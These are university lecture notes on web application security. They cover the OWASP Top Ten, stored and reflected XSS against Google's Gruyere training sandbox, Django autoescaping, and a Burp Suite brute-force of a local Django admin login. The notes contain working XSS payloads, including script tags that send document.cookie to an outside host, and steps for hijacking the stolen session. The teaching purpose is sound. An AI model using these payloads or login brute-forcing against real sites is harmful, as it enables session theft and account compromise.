# CS2610 - Mon Apr 15 - Module 7

# Announcements

## Computer Science Department Spring Social and Awards Dinner
Tomorrow, 4/16 5–7 pm @ West Stadium Center

* Free Dinner - Taco Bar & Drinks from The Italian Place
* Prizes
* The RSVP list is full!  Contact cora.price@usu.edu to get on the wait list.



## FSLC Closing Social
* Come relax and de-stress before finals week sucks the fun out of life
* Pizza will be provided
* Wednesday, 4/17 7pm @ ESLC 053



# Topics:

* Mudcard and SSH vulnerabilities
* OWASP Top Ten Project
* Learn to attack a real-life webapp with a pretend webapp
* Can XSS happen on Django?
* Break into Django with BurpSuite



--------------------------------------------------------------------------------
# Mudcard and SSH vulnerabilities

Take a minute and answer the following questions on your mudcards

`mudcard()`

Last month when we learned about SSH, I got a few mudcard questions related to
SSH security.

> Does SSH have any weaknesses?

SSH is software, so yes, it has weaknesses.  Find out what the known ones are
by searching the CVE database:

* [CVE's for OpenSSH](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=openssh)


> I want to know how to set up my own secure server at home, how can I learn
> more about that?

Let me demonstrate what some of the pitfalls are by showing you the SSH log
of my Raspberry Pi at home.


### Three truths you must embrace

1. Life is risk
2. Everything is vulnerable
3. Attacks happen all the time


### If you accept the risks...

1. Ask yourself if you *really* need to run a service.  The more software you
   expose to the internet, the more vulnerable you are.
2. Read all of the documentation and follow best security practices
3. Decide how this software will fit in with your existing systems
4. Follow the vendor's news and apply patches at your earliest convenience



--------------------------------------------------------------------------------
# OWASP Top Ten Project

The OWASP Top 10 is based on data submissions from firms that specialize in
application security and an INDUSTRY survey.  This data spans vulnerabilities
gathered from hundreds of organizations and over 100,000 real-world
applications and APIs.  The Top 10 items are selected and prioritized according
to this prevalence data, in combination with consensus estimates of
exploitability, detectability, and impact.

A primary aim of the OWASP Top 10 is to educate developers, designers,
architects, managers, and organizations about the consequences of the most
common and most important web application security weaknesses. The Top 10
provides basic techniques to protect against these high risk problem areas, and
provides guidance on where to go from here.

* [OWASP Top Ten 2017](https://www.owasp.org/index.php/Top_10-2017_Top_10)


The #1 exploit since 2007 has been injection attacks.  Today you'll see how to
inject malicious JavaScript code into somebody else's webpage.

#### Cross-Site Scripting (XSS)
A vulnerability that permits an attacker to inject JavaScript code into the
contents of a website not under the attacker's control.  When other users visit
this site their browsers now run the attacker's code.

A better name for this exploit would have been "JavaScript Injection".


#### Reflected Cross-Site Scripting
Idem, but the embedded JavaScript code is delivered via a specially-crafted
URL.  This attack relies on you getting a victim to click on a link which
causes either the server or the browser to do something risky.


--------------------------------------------------------------------------------
# Learn to attack a real-life webapp with a pretend webapp

There are lots of excellent web-based resources to learn how to do code
injections.  I like Google's Gruyere Codelab because it's simple, Open Source,
and includes excellent documentation to help you come up to speed quickly.

We'll visit [Gruyere](https://google-gruyere.appspot.com/) and set up our own
little sandboxed app.  We'll explore the site and see if we come across
anything that raises red flags.


## Let's see if we can inject these JavaScript commands into Google Gruyere

    // Steal the user's cookies
    alert(document.cookie)

    // Annoy the user
    history.back()

    // A good ol' RickRoll
    window.open("https://www.youtube.com/watch?v=yErnuebA9Yo&start=22")



## Stored XSS

This exploit is to put a `script` tag on a page such that other users visiting
the site will run our code.  Gruyere lets users post "snippets" with support
for "limited HTML".  Let's find out what they mean by "*limited*".

### Stored XSS in a Snippet

+ "Sign up" for a new account
+ "New Snippet"
+ Input this text into the `textarea`:

    <a onmouseover="alert('I stole your cookies ' + document.cookie)" href="#">Click me to win</a>

**Remediation**:  Sanitize user input.  Don't allow users to input HTML.


### Stored XSS in an HTML attribute

Gruyere lets users customize their profile by picking a color to present their
username.  I wonder how this works?

+ Click "Profile" at the top of the page
+ Enter `orange` as the Profile Color and "Update"
+ Use "View Source" to see how the color is set on the user name; it's applied
  on the `style` attribute of a `span` tag, and surrounded with single quotes.
+ Return to "Profile" and enter this as your color:
    magenta' onmouseover='history.back()

*Question*: Is this exploit preventable by giving users an `input` where `type="color"`?

**Remediation**: Sanitize any user-provided text which may appear within an HTML attribute.


### Stored XSS via AJAX

Visit https://google-gruyere.appspot.com/375075502316416254854345754740496557792/feed.gtl
  and view source.  Does anything stand out to us here?

+ "New Snippet"
+ Input this text into the `textarea`:

    Never gonna<span style=display:none>" + window.open('https://www.youtube.com/watch?v=yErnuebA9Yo&start=22') + "</span> let you down

+ Return to the Gruyere Home page
+ Click the "Refresh" link

**Remediation**: Sanitize user-provided text both on the server-side (before
it's stored to a database) and on the client-side.  Don't use the `eval()`
function, because it can do *anything*


### Stored XSS in a username

Can we put a `script` tag into a user account?

+ Sign Out
+ Sign Up
+ Enter a `script` tag and code into the "User name" field

At first glance it seems that we cannot do this because the maximum length for
a username is too short to admit any useful code.  But is this limit a **hard**
limit?  Is this limit enforced on the *back-end* as well as on the *front-end*?

+ Open the Inspector and locate the User name `input` element
+ Remove the `maxlength` attribute
+ Enter one of our snippets from above wrapped in `script` tags

**Remediation**: Validate and sanitize data on the back-end.  After all, the
computer on the back-end is the only computer over which you have any control.



## Reflected XSS

Recall that reflected XSS is when we encode instructions into a URL.  This
crafted URL could come to you as a link in a spam email, or it could be
placed on another site waiting for unsuspecting users to click on it.

This attack hinges on the site taking data from the address and incorporating
it into the body of the document somehow.  On an unrelated note, I wonder what
happens when we try to visit a non-existent page on Gruyere?

+ In the URL bar, delete any '#' character and text that may follow it
+ Append something else to the URL, like `1+1 = 2` or `<h2>hello</h2><h1>world</h1>`

Notice that the error message includes whatever junk we put into the URL.
That's a curious thing about the HTML tags being rendered.  I wonder what
happens if we put a `script` tag in there?

    <script>alert(document.cookie)</script>

Instead of annoying the user with a pop-up box which will scare them, let's try
to inject a script which will send them (and their cookie) to a website I
control.  If I can trick people into visiting

    http://unnovative.net/cookie=...

I could collect information that may be used to impersonate them on this site.

+ In the URL bar, append this code to the address
    <script>fetch("http://unnovative.net/cookie="+document.cookie)</script>

+ Open the Network tab and see if the browser makes a request to unnovative.net

Oh good!  By some combination of the browser and this site, I cannot simply use
the `fetch()` API to surreptitiously steal their session cookie.  It's a
*really* good thing that there are absolutely no other ways to make a browser
perform a GET request.

    <script>i=new Image();i.src="http://unnovative.net/cookie="+document.cookie</script>


Oh, forgot about that one...

+ Open a private tab and visit the base Gruyere URL for my instance
+ Open the JavaScript console and enter `document.cookie = ''` and paste the
  session cookie from my server log on unnovative.net into the quotes
+ Refresh the page in the private session

**Remediation**: Sanitize *all* user input that appears on the page.
This extends even to the address; it comes from the user.



--------------------------------------------------------------------------------
# Can XSS happen on Django?

Does XSS work against the Django blog you created in Assignment 3?  Recall that
your Django blog accepts input from users in the form of comments to blog
posts.

Try these techniques on your own blog assignment and see if it's vulnerable!

Let's fire up a blog and see what we can get away with in the comment section


    hi &lt;h1&gt;there &lt;/h1&gt;

    hi <span onmouseover="alert('yo mamma hovers!')">there</span>


Django template variables automatically have sensitive HTML chars escaped:
https://docs.djangoproject.com/en/2.0/ref/templates/language/#automatic-html-escaping

By default in Django, every template automatically escapes the output of
every variable tag. Specifically, these five characters are escaped:

* < is converted to &lt;
* > is converted to &gt;
* ' (single quote) is converted to &#39;
* " (double quote) is converted to &quot;
* & is converted to &amp;

To make XSS work in Django, you must disable `autoescape` by wrapping the
relevant portion of the template in these tags:
    {% autoescape off %}
    {% endautoescape %}

Since you would have to go out of your way to do this, your blog is already
protected against XSS :)



--------------------------------------------------------------------------------
# Break into Django with [BurpSuite](https://portswigger.net/burp/)

Burp is like an IDE for breaking web applications.

It operates as an HTTP proxy, sitting between your browser and a web server.
From this vantage point it can inspect and manipulate traffic going in both
directions.

On [Wednesday, April 10th](../Apr_10/notes.md) we saw how to use a brute force
script with Nmap to break into a WordPress site with a weak password.  Right at
the end of class I also demonstrated using a tool called Hydra to brute force
our way into an SSH server with a weak password.  The authentication used by
your Django admin page is rather sophisticated, and gives these tools a hard
time.  Let's apply the Burp tool to the problem and see how it fares.




#### Cracking into Django Admin with Burp Suite Community + password list

Get [Burp Suite Community Edition](https://portswigger.net/burp/communitydownload)

This is terribly slow in the Community edition; it does about 1 req. per sec.
But it does work!

I followed along with the instructions presented in this
[YouTube video](https://www.youtube.com/watch?v=EC9BI7SLo9Y).  The most
important difference is that I knew that I was targeting the 'admin' account,
so I applied the dictionary only to the password field.

1. `python manage.py createsuperuser admin`
   Create a truly stupid password, something that's in the top 20 of a password
   list since this process is terribly slow.  You have to set a weak password
   at the time of user creation because the `changepassword` tool doesn't let
   you set a weak password later on.

2. Fire up Burp Suite, add `http://localhost:8000` to scope

3. Enable interception

4. In Firefox goto `about:preferences`, enable basic manual proxy for `localhost` and `8080`

5. Visit `http://localhost:8000/admin` in FF, intercept a login request with
   bogus creds, and send to "Intruder"

6. In the "Intruder" tool, clear all selections, then select the password part
   of the request

7. Choose a wordlist for field 1, and use the `rockyou_top512.txt` password
   file

8. "Start Attack"

9. Watch for one request that differs from the others - the correct password
   results in a HTTP 302 redirect to /admin/ and has a different response length.
